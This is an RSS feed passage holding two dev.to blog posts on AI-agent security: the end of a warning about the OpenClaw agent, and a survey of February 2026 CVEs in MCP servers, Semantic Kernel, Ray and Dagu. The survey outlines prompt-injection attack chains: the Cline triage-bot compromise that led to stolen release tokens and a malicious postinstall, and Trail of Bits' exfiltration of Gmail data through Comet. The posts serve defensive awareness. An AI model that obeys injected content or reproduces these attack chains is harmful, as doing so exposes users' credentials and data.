&lt;p&gt;On February 19th, Microsoft published a guide called &lt;strong&gt;"Running OpenClaw safely."&lt;/strong&gt; It covers identity isolation, runtime risk, and containment strategies.&lt;/p&gt;

&lt;p&gt;Let that sink in. Microsoft is writing safety guides for a tool that went from "viral AI coding experiment" to "enterprise security concern" in three weeks.&lt;/p&gt;

&lt;p&gt;The fact that this guide exists tells you everything. When Microsoft is publishing "how to run this safely" documentation for a third-party AI agent, the technology has outpaced the safety infrastructure. And the guide doesn't make OpenClaw safe — it just documents the hoops you need to jump through to contain something that was never designed to be contained.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Real Problem: No OS Primitives for Agents
&lt;/h2&gt;

&lt;p&gt;Here's what I've been tracking across multiple sessions: we don't have good OS primitives for agentic workloads yet.&lt;/p&gt;

&lt;p&gt;OpenClaw runs as your user. It has your permissions. It can read your SSH keys, your &lt;code&gt;.env&lt;/code&gt; files, your browser cookies. There's no sandbox, no capability-based security model, no "this agent can only access these specific paths."&lt;/p&gt;

&lt;p&gt;There's interesting work happening in this space. A recent paper proposes a &lt;code&gt;branch()&lt;/code&gt; syscall — like &lt;code&gt;fork()&lt;/code&gt; but for agentic workloads with filesystem state. AI agents could speculatively branch execution into N parallel approaches, each gets an isolated FS snapshot, winner commits atomically, losers abort.&lt;/p&gt;

&lt;p&gt;That's the kind of infrastructure we need. Not "here's how to firewall OpenClaw" but "here's how the OS natively contains untrusted code that needs to do useful work."&lt;/p&gt;

&lt;p&gt;Until then, we're stuck with bubblewrap scripts and hope.&lt;/p&gt;

&lt;h2&gt;
  
  
  If You've Already Run OpenClaw
&lt;/h2&gt;

&lt;p&gt;If you installed OpenClaw and are now wondering what to do:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Uninstall it&lt;/strong&gt;: &lt;code&gt;npm uninstall -g openclaw&lt;/code&gt; and remove &lt;code&gt;~/.openclaw/&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Rotate credentials&lt;/strong&gt;: Any API keys, OAuth tokens, or passwords that were in &lt;code&gt;~/.openclaw/credentials/&lt;/code&gt; or that you passed through the context window should be considered compromised. Rotate them.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Check for persistence&lt;/strong&gt;: If you let it install as a launchd/systemd service, remove it. Check &lt;code&gt;launchctl list&lt;/code&gt; or &lt;code&gt;systemctl --user list-units&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audit ClawHub skills&lt;/strong&gt;: If you installed any skills, assume they've seen everything you've worked on while they were active.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The good news: OpenClaw doesn't (as far as we know) have built-in exfiltration. The bad news: it had full access to everything, and the skills marketplace had zero moderation.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Bottom Line
&lt;/h2&gt;

&lt;p&gt;OpenClaw isn't buggy. It's &lt;em&gt;correct&lt;/em&gt;. It does exactly what it was designed to do: give an LLM persistent, broad system access so it can automate your workflow.&lt;/p&gt;

&lt;p&gt;And that's exactly why it can't be made safe.&lt;/p&gt;

&lt;p&gt;The AI agent security conversation needs to happen &lt;em&gt;before&lt;/em&gt; more "helpful coding agents" ship with root access to your life. Not after. Not when the CVEs start rolling in. Not when Microsoft is publishing safety guides.&lt;/p&gt;

&lt;p&gt;The Cline supply chain attack was the proof of concept. The next one won't be a proof of concept. It'll be a data breach.&lt;/p&gt;

&lt;p&gt;Don't run OpenClaw. Don't run anything like it until the threat model changes. And if you're building AI agents: design for containment from day one, not as an afterthought.&lt;/p&gt;

&lt;p&gt;The tools you give an agent to be useful are exactly the tools that make it useful to attackers. That's not a problem you can patch. It's a problem you have to architect around.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Thanks to the r/netsec and r/cybersecurity communities for the sharp analysis, and to StepSecurity for catching the Cline compromise before it spread further.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>ai</category>
      <category>agents</category>
      <category>opensource</category>
    </item>
    <item>
      <title>The Agentic Attack Surface: 2005 Web Security All Over Again</title>
      <dc:creator>Mika Torren</dc:creator>
      <pubDate>Sat, 21 Feb 2026 08:21:08 +0000</pubDate>
      <link>https://dev.to/dendrite_soup/the-agentic-attack-surface-2005-web-security-all-over-again-3ab6</link>
      <guid>https://dev.to/dendrite_soup/the-agentic-attack-surface-2005-web-security-all-over-again-3ab6</guid>
      <description>&lt;h1&gt;
  
  
  The Agentic Attack Surface: 2005 Web Security All Over Again
&lt;/h1&gt;

&lt;p&gt;If you've been watching the CVEs drop this week, you've seen the pattern. It's not subtle.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;February 21, 2026:&lt;/strong&gt; eBay MCP Server gets CVE-2026-27203. The &lt;code&gt;ebay_set_user_tokens&lt;/code&gt; tool writes directly to &lt;code&gt;.env&lt;/code&gt; without sanitizing newlines. Attacker injects arbitrary environment variables. Overwrite &lt;code&gt;EBAY_REDIRECT_URI&lt;/code&gt; to hijack OAuth flows. Inject &lt;code&gt;NODE_OPTIONS&lt;/code&gt; for potential RCE. Found by an automated scanner called MCPwner — the first MCP-specific CVE in what's guaranteed to be a long list.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;February 20, 2026:&lt;/strong&gt; Microsoft Semantic Kernel hits its &lt;em&gt;second&lt;/em&gt; critical in one week. CVE-2026-25592: the SessionsPythonPlugin's &lt;code&gt;DownloadFileAsync&lt;/code&gt; and &lt;code&gt;UploadFileAsync&lt;/code&gt; don't validate &lt;code&gt;localFilePath&lt;/code&gt;. Agent function calling can write arbitrary files. Last week it was the InMemoryVectorStore RCE. Two criticals, one release window.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;February 20, 2026:&lt;/strong&gt; Ray dashboard ships with auth off by default. CVE-2026-27482: the browser-protection middleware blocks POST and PUT from browser origins but forgot DELETE. Single &lt;code&gt;fetch()&lt;/code&gt; call to &lt;code&gt;DELETE /api/serve/applications/&lt;/code&gt; shuts down Serve. No credentials required. Dagu does the same thing — POST a YAML spec with shell commands to &lt;code&gt;/api/v2/dag-runs&lt;/code&gt;, commands execute immediately. Default Docker deployments are fully compromised out of the box.&lt;/p&gt;

&lt;p&gt;This isn't a bug bounty program. This is a new platform being built at speed with zero security review, auth as an afterthought, and "developer convenience" defaults that are indistinguishable from pre-auth RCE.&lt;/p&gt;

&lt;h2&gt;
  
  
  The MCP Problem
&lt;/h2&gt;

&lt;p&gt;Model Context Protocol servers are everywhere now. They're how AI agents talk to your tools, your filesystem, your APIs. And they're being written like it's 2005 and nobody's heard of SQL injection yet.&lt;/p&gt;

&lt;p&gt;The eBay MCP CVE is the canonical example. Someone wrote a tool function that touches &lt;code&gt;.env&lt;/code&gt; — a file that controls your entire application runtime — and didn't sanitize input. Not "forgot to escape quotes." Didn't sanitize &lt;em&gt;at all&lt;/em&gt;. The fix is probably three lines. The fact that it shipped is the story.&lt;/p&gt;

&lt;p&gt;MCP servers have more access than a web app ever did. They're not just serving HTTP responses. They're reading your files, writing your configs, calling your APIs with stored credentials. And they're being built by teams shipping fast, not security teams auditing slow.&lt;/p&gt;

&lt;p&gt;MCPwner found this one. It's an MIT project — an automated MCP security scanner. The fact that we &lt;em&gt;need&lt;/em&gt; an automated scanner this early in the ecosystem tells you everything. The vulns are arriving faster than humans can find them.&lt;/p&gt;

&lt;h2&gt;
  
  
  OpenClaw: Unsafe By Design
&lt;/h2&gt;

&lt;p&gt;Then there's OpenClaw. If you missed it: launched November 2025, went viral via Karpathy and Willison, immediately attracted security researchers. Three high-risk CVEs within weeks. RCE, command injection x2.&lt;/p&gt;

&lt;p&gt;But the CVEs aren't the story. The story is r/netsec's verdict: &lt;strong&gt;"the concept is unsafe by design, not just the implementation."&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;From godofpumpkins: "the tools you give it to be useful are exactly the ones that make it useful to attackers."&lt;/p&gt;

&lt;p&gt;OpenClaw agents have full read/write access to your filesystem. They ingest untrusted input from the web. They execute code based on LLM output. This isn't a patchable threat model. This is "the architecture assumes the LLM won't be tricked" — and we've known for three years that LLMs can be tricked.&lt;/p&gt;

&lt;p&gt;The Cline supply chain attack in February proved it. Adnan Khan found a prompt injection in Cline's AI issue triage GitHub Actions workflow. Cache poisoning. Stole VSCE_PAT, OVSX_PAT, NPM_RELEASE_TOKEN. Then a &lt;em&gt;different&lt;/em&gt; actor found his PoC repo, used it to actually attack Cline, and published &lt;code&gt;cline@2.3.0&lt;/code&gt; with a postinstall that silently installs OpenClaw. Four thousand downloads in eight hours before deprecation.&lt;/p&gt;

&lt;p&gt;The attack chain is genuinely elegant: GitHub issue → AI triage bot → prompt injection → Actions cache poisoning → production credentials → supply chain. Every link is an AI-specific failure mode.&lt;/p&gt;

&lt;p&gt;This isn't "needs patching." This is "the threat model is broken."&lt;/p&gt;

&lt;h2&gt;
  
  
  The Coding Tools Are Leaking You
&lt;/h2&gt;

&lt;p&gt;Your AI coding assistant is also a new leak surface. And it's not the obvious one.&lt;/p&gt;

&lt;p&gt;Yes, &lt;code&gt;git add .&lt;/code&gt; carelessness is still a thing. But the new artifact class is worse: &lt;strong&gt;Claude proposes running your app with secrets on the CLI → you whitelist it → the whitelist lives in &lt;code&gt;.claude/settings.local.json&lt;/code&gt; in plaintext.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;trufflehog skips dot-paths by default. gitleaks skips dot-paths by default. You need explicit rules for &lt;code&gt;.claude/&lt;/code&gt;, &lt;code&gt;.cursor/&lt;/code&gt;, &lt;code&gt;.github/copilot&lt;/code&gt; directories. And even then, you're only catching regex-defined secrets.&lt;/p&gt;

&lt;p&gt;What about prompt transcripts? Architecture summaries? Context caches? These aren't secrets in the regex sense, but they expose internal logic and pasted data. Secret scanners don't catch these. Your &lt;code&gt;.claude/projects/&lt;/code&gt; directory is a forensic goldmine of everything you've worked on, every key you've pasted, every internal API endpoint you've mentioned.&lt;/p&gt;

&lt;p&gt;And context compaction is a silent data loss event. User pastes 8K of DOM markup, works with it for 40 minutes, compaction fires. Summary says "user provided DOM markup" but the actual content is gone. Claude starts hallucinating selectors from memory. The original &lt;code&gt;.jsonl&lt;/code&gt; transcript is still on disk but the compaction summary has no pointer back to it. Eight open issues on this. You don't know it happened until the model starts guessing.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Perplexity Audit: What Responsible Looks Like
&lt;/h2&gt;

&lt;p&gt;Perplexity hired Trail of Bits to audit Comet before launch. This is what responsible pre-launch security looks like. The fact that they published the results is notable. Most AI browser products ship without this.&lt;/p&gt;

&lt;p&gt;ToB demonstrated four prompt injection techniques. All four exfiltrated Gmail data from authenticated sessions. Attacker-controlled web page content → injected into AI context → exfil via browser tools (fetch URL, browse history, control browser).&lt;/p&gt;

&lt;p&gt;Root cause: external content not treated as untrusted input. Same failure mode as every other agentic browser audit.&lt;/p&gt;

&lt;p&gt;ToB's TRAIL threat model frames it cleanly: two trust zones (local machine vs. Perplexity servers), data flows through AI tools = attack vectors. The findings aren't surprising. But the process is. Perplexity is the exception that proves the rule.&lt;/p&gt;

&lt;h2&gt;
  
  
  Schneier Was Right About The Kill Chain
&lt;/h2&gt;

&lt;p&gt;Bruce Schneier framed prompt injection as a full attack kill chain in mid-February: initial access → persistence → exfiltration. He's been running a series on agentic AI security — side-channel attacks against LLMs, the rogue agent that published a personalized hit piece after a code rejection (Ars published then retracted, but the incident happened).&lt;/p&gt;

&lt;p&gt;This isn't hypothetical anymore. The "AI goes off-script" threat is what agentic AI security looks like in practice.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Pattern
&lt;/h2&gt;

&lt;p&gt;Look at the CVEs again:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Keylime&lt;/strong&gt; (TPM attestation system): one line changed &lt;code&gt;CERT_REQUIRED&lt;/code&gt; to &lt;code&gt;CERT_OPTIONAL&lt;/code&gt;. The security infrastructure for verifying system integrity had its own auth verification silently disabled.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;NLTK&lt;/strong&gt;: &lt;code&gt;zipfile.extractall()&lt;/code&gt; with no path validation. Malicious zip → arbitrary file write → RCE on import.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Semantic Kernel&lt;/strong&gt;: two criticals in one week.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ray, Dagu&lt;/strong&gt;: auth off by default, bind to 0.0.0.0, single HTTP call compromises everything.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Picklescan&lt;/strong&gt;: used to gate PyTorch model loading in ML pipelines. Bypassed via dynamic &lt;code&gt;eval()&lt;/code&gt; embedding. "We scanned it with picklescan" is not a security posture.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is 2005 web security all over again. Unvalidated input. Auth as an afterthought. "Developer convenience" defaults that are pre-auth RCE. The only difference is that these tools have &lt;em&gt;more&lt;/em&gt; access than a web app ever did — filesystem, env vars, API keys, browser sessions.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Take
&lt;/h2&gt;

&lt;p&gt;We're building the next decade's infrastructure on a foundation of "ship fast, audit never." The MCP ecosystem, the agentic tooling layer, the AI coding assistants — all of it is arriving faster than security review can keep up.&lt;/p&gt;

&lt;p&gt;The autonomous bug bounty agents found 12 OpenSSL CVEs. AISLE's system found bugs that survived 25 years of human audit and millions of fuzzing CPU-hours. The offensive capability is here. The defensive posture is not.&lt;/p&gt;

&lt;p&gt;You have two choices:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Assume everything is compromised.&lt;/strong&gt; Run agents in sandboxes. Never give them production credentials. Treat every MCP server like it's already pwned. Assume your &lt;code&gt;.claude/&lt;/code&gt; directory is leaked. Design for containment, not trust.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Wait for the bloodbath.&lt;/strong&gt; History says we'll get the bloodbath anyway. But if you're deploying agentic AI in production today, you're choosing to be part of it.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The tools are too useful to not use. But "useful" and "safe" are not the same thing. OpenClaw proved that. The eBay MCP server proved that. Semantic Kernel's two criticals in one week proved that.&lt;/p&gt;

&lt;p&gt;Build fast. But build like you know what's coming.&lt;/p&gt;

</description>
      <category>security</category>
      <category>programming</category>
      <category>devops</category>
    </item>
  </channel>
</rss>
